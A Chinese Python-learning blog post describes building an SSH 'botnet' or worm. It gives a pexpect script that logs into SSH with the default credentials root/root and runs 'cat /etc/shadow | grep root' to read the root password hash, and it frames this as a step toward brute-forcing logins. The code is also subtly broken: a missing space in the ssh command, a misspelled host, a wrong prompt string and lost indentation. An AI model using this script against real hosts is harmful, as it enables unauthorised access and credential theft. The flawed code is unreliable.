学习Python第十七天:用python构建一个SSH僵尸网络

2024-04-08 18:04

本文主要是介绍学习Python第十七天:用python构建一个SSH僵尸网络,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

在上一节我们已经创建了一个用来搜寻目标的端口扫描程序,选择可以开始利用这些服务中的漏洞了。Morris蠕虫有三种攻击方式,其中之一就是用常见的用户名和密码尝试登录RSH服务,RSH是1988年问世的,他为系统管理员提供了一种很棒的远程连接一台机器,并能在主机运行一系列终端命令对它进行管理的方法。

后来人们在RSH中增加一个公钥加密算法,以保护其经过网络传递的数据,这就是SSH协议,最终SSH协议替代了RSH。不过,对于防范用常见用户名和密码尝试暴力破解登录的攻击方法,这并不能起到多大作用。SSH蠕虫已经被证明是非常成功的和常见的攻击方式。

用Pexpect与SSH交互

现在,让我们来实现我们自己的能暴力破解待定目标用户名/密码的SSH蠕虫。因为SSH客户端需要用户与之进行交互,我们的脚本必须在发送进一步的输入命令之前等待并理解屏幕输出的意义。请考虑以下情形:要连接我们架在IP地址127.0.0.1上SSH的机器,应用程序首先会要求我们确认RSA密钥指纹,这时我们必须回答“是”,然后才能继续,接下来,在给我们一个命令提示符之前,应用程序要求我们输入密码,最后,我们还要执行uname -v命令来确定目标机器上系统内核的版本。

为了完成上述控制台交互过程,我们需要使用一个第三方python模块——Pexpect。Pexpect能够实现与程序交互,等待预期的屏幕输出,并据此作出不同的响应,这使得它称为暴力破解SSH用户口令程序的首选工具。

检测connect()函数,该函数接收的参数包括一个用户名,主机名和密码,返回的是以此进行SSH连接的结果,然后,利用pexpect库,我们的程序等待一个可以预计到的输出,可能会出现三种可能的结果:超时,表示主机已使用一个新的公钥的消息和要求输入密码的提示。如果出现超时,那么session.expect()返回为零,用下面的if语句会识别出这一情况,打印一个错误消息后返回,如果child.expect()方法捕获了ssh_newkey消息,他会返回一个1,这会使函数发送一个yes消息,以接收新的密钥,之后,函数等待密码提示,然后发送SSH密码。

import pexpect
prompt = ['#','>>>','>','\$']
def sen_command(child,cmd):child.sendline(cmd)#发送你想要执行的命令child.expect(prompt)#匹配命令符print(child.before)#输出执行的结果
def connect(user,host,password):ssh_newkey = 'Are you want to continue connecting?'connStr = 'ssh'+user+'@'+host#构建ssh命令,完整的为ssh 用户名@主机地址child = pexpect.spawn(connStr)#将上面的ssh命令放入spawn函数中创建一个新的子进程ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword:'])#这句话是用来等待子进程的输出,如果超时了没有输出任何东西,就会匹配到pexpect.TIMEOUT,其值为0#如果输出了ssh_newkey,那一般就是ssh连接时的一种提示,一般用来确认远程连接的公钥,其值通常为1#如果输出了[P|p]assword:,表示子进程正在请求输入密码,其值一般为2if ret ==1:#如果匹配到了ssh_newkey,也就是匹配到了新密钥child.sendline('yes')#那么向子进程发送yes,表示接受这个新密钥ret = child.expect([pexpect.TIMEOUT,'[P|p]assword:'])#接着,就是等待超时,或者输入密码if ret ==0:#如果为0,那就输出错误,超时了,并且返回print('[-] error connecting')return child.sendline(password)#如果已经收到输入密码的提示,则将密码发送到子进程child.expect(prompt)#等待子进程与特定的操作符进行匹配,如果匹配成功则开始进行交互#prompt = ['#','>>>','>','\$'],#一般是root管理员,<<<一般是pythonreturn child

一旦通过验证,我们就可以使用一个单独的comand()函数在SSH会话中发送命令。command()函数需要接受的参数是一个SSH会话和命令字符串,然后,它向会话发送命令字符串,并等待命令提示符再次出现,在获得命令提示符后,该函数把从SSH会话那里得到的结果打印出来。把这些打包起来就得到一个完整的可以模拟人的交互行为的连接和控制SSH会话的脚本。

import pexpect
prompt = ['#','>>>','>','\$']
def sen_command(child,cmd):child.sendline(cmd)#发送你想要执行的命令child.expect(prompt)#匹配命令符print(child.before)#输出执行的结果
def connect(user,host,password):ssh_newkey = 'Are you want to continue connecting?'connStr = 'ssh'+user+'@'+host#构建ssh命令,完整的为ssh 用户名@主机地址child = pexpect.spawn(connStr)ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword:'])if ret ==1:child.sendline('yes')ret = child.expect([pexpect.TIMEOUT,'[P|p]assword:'])if ret ==0:print('[-] error connecting')return child.sendline(password)child.expect(prompt)return childdef main():host = 'loclahost'user = 'root'password = 'root'child = connect(user,host,password)sen_command(child,'cat /etc/shadow | grep root')
if __name__=='__main__':main()

今天的学习分享就到这里,谢谢大家的观看。

这篇关于学习Python第十七天:用python构建一个SSH僵尸网络的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/886204

相关文章

HarmonyOS学习(七)——UI(五)常用布局总结

自适应布局 1.1、线性布局(LinearLayout) 通过线性容器Row和Column实现线性布局。Column容器内的子组件按照垂直方向排列,Row组件中的子组件按照水平方向排列。 属性说明space通过space参数设置主轴上子组件的间距,达到各子组件在排列上的等间距效果alignItems设置子组件在交叉轴上的对齐方式,且在各类尺寸屏幕上表现一致,其中交叉轴为垂直时,取值为Vert

Ilya-AI分享的他在OpenAI学习到的15个提示工程技巧

Ilya(不是本人,claude AI)在社交媒体上分享了他在OpenAI学习到的15个Prompt撰写技巧。 以下是详细的内容: 提示精确化:在编写提示时,力求表达清晰准确。清楚地阐述任务需求和概念定义至关重要。例:不用"分析文本",而用"判断这段话的情感倾向:积极、消极还是中性"。 快速迭代:善于快速连续调整提示。熟练的提示工程师能够灵活地进行多轮优化。例:从"总结文章"到"用

python: 多模块(.py)中全局变量的导入

文章目录 global关键字可变类型和不可变类型数据的内存地址单模块(单个py文件)的全局变量示例总结 多模块(多个py文件)的全局变量from x import x导入全局变量示例 import x导入全局变量示例 总结 global关键字 global 的作用范围是模块(.py)级别: 当你在一个模块(文件)中使用 global 声明变量时,这个变量只在该模块的全局命名空

【前端学习】AntV G6-08 深入图形与图形分组、自定义节点、节点动画(下)

【课程链接】 AntV G6:深入图形与图形分组、自定义节点、节点动画(下)_哔哩哔哩_bilibili 本章十吾老师讲解了一个复杂的自定义节点中,应该怎样去计算和绘制图形,如何给一个图形制作不间断的动画,以及在鼠标事件之后产生动画。(有点难,需要好好理解) <!DOCTYPE html><html><head><meta charset="UTF-8"><title>06

学习hash总结

2014/1/29/   最近刚开始学hash,名字很陌生,但是hash的思想却很熟悉,以前早就做过此类的题,但是不知道这就是hash思想而已,说白了hash就是一个映射,往往灵活利用数组的下标来实现算法,hash的作用:1、判重;2、统计次数;

嵌入式QT开发:构建高效智能的嵌入式系统

摘要: 本文深入探讨了嵌入式 QT 相关的各个方面。从 QT 框架的基础架构和核心概念出发,详细阐述了其在嵌入式环境中的优势与特点。文中分析了嵌入式 QT 的开发环境搭建过程,包括交叉编译工具链的配置等关键步骤。进一步探讨了嵌入式 QT 的界面设计与开发,涵盖了从基本控件的使用到复杂界面布局的构建。同时也深入研究了信号与槽机制在嵌入式系统中的应用,以及嵌入式 QT 与硬件设备的交互,包括输入输出设

Linux 网络编程 --- 应用层

一、自定义协议和序列化反序列化 代码: 序列化反序列化实现网络版本计算器 二、HTTP协议 1、谈两个简单的预备知识 https://www.baidu.com/ --- 域名 --- 域名解析 --- IP地址 http的端口号为80端口,https的端口号为443 url为统一资源定位符。CSDNhttps://mp.csdn.net/mp_blog/creation/editor

【Python编程】Linux创建虚拟环境并配置与notebook相连接

1.创建 使用 venv 创建虚拟环境。例如,在当前目录下创建一个名为 myenv 的虚拟环境: python3 -m venv myenv 2.激活 激活虚拟环境使其成为当前终端会话的活动环境。运行: source myenv/bin/activate 3.与notebook连接 在虚拟环境中,使用 pip 安装 Jupyter 和 ipykernel: pip instal

零基础学习Redis(10) -- zset类型命令使用

zset是有序集合,内部除了存储元素外,还会存储一个score,存储在zset中的元素会按照score的大小升序排列,不同元素的score可以重复,score相同的元素会按照元素的字典序排列。 1. zset常用命令 1.1 zadd  zadd key [NX | XX] [GT | LT]   [CH] [INCR] score member [score member ...]

Retrieval-based-Voice-Conversion-WebUI模型构建指南

一、模型介绍 Retrieval-based-Voice-Conversion-WebUI(简称 RVC)模型是一个基于 VITS(Variational Inference with adversarial learning for end-to-end Text-to-Speech)的简单易用的语音转换框架。 具有以下特点 简单易用:RVC 模型通过简单易用的网页界面,使得用户无需深入了